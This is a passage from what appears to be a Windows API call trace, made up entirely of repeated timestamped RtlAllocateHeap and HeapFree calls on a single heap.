hHeap=0x4970000) returned 1 [0129.923] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.923] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.923] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.923] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.923] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.923] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0129.923] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.923] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.923] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.923] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.923] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0129.923] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.923] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.923] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.923] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.923] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.923] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.923] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.924] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.924] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0129.924] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.924] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.924] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.924] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0129.924] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.924] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.924] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.924] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0129.924] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.924] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.924] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.924] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.924] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.924] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.924] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.924] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.924] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.924] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.924] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.924] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0129.924] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.924] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.924] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.924] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0129.924] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.924] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.925] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.925] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.925] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.925] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.925] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.925] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.925] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.925] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.925] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.925] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.925] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.925] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.925] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.925] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.925] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.925] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.925] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.925] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.925] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.925] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.925] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.925] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.925] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.925] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.925] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.925] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.925] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.925] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.925] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.926] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.926] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0129.926] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.926] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.926] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.926] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.926] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.926] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.926] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.926] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.926] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.926] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0129.926] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.926] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.926] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.926] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.926] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0129.926] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.926] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.926] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.926] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0129.926] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.926] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.926] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.926] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.926] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.926] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.926] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.926] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.927] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.927] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.927] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.927] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.927] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0129.927] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.927] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.927] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.927] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.927] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0129.927] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.927] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.927] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.927] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0129.927] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.927] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.927] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.927] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.927] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.927] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.927] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.927] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.927] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.927] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.927] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.927] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.927] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.927] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.928] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.928] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.928] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.928] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.928] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.928] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.928] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.928] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.928] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.928] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.928] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.928] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.928] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.928] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.928] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.928] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.928] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.928] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.928] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0129.928] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.928] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.928] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.928] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.928] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.928] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.928] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.928] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.928] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0129.928] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.928] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.929] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.929] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0129.929] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.929] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.929] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.929] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.929] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.929] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.929] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.929] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.929] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.929] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.929] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.929] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.929] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0129.929] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.929] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.929] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.929] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.929] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0129.929] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.929] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.929] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.929] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0129.929] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.929] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.929] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.929] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.929] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.929] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.930] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.930] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.930] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.930] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.930] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.930] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.930] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.930] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.930] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.930] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.930] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.930] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.930] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.930] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.930] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.930] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.930] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.930] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.930] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.930] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.930] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.930] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.930] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.930] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.930] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.930] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.930] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0129.930] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.930] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.930] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.931] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.931] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.931] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.931] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.931] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.931] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0129.931] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.931] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.931] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.931] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0129.931] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.931] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.931] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.931] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.931] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.931] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.931] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.931] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.931] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.931] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.931] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.931] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.931] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0129.931] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, 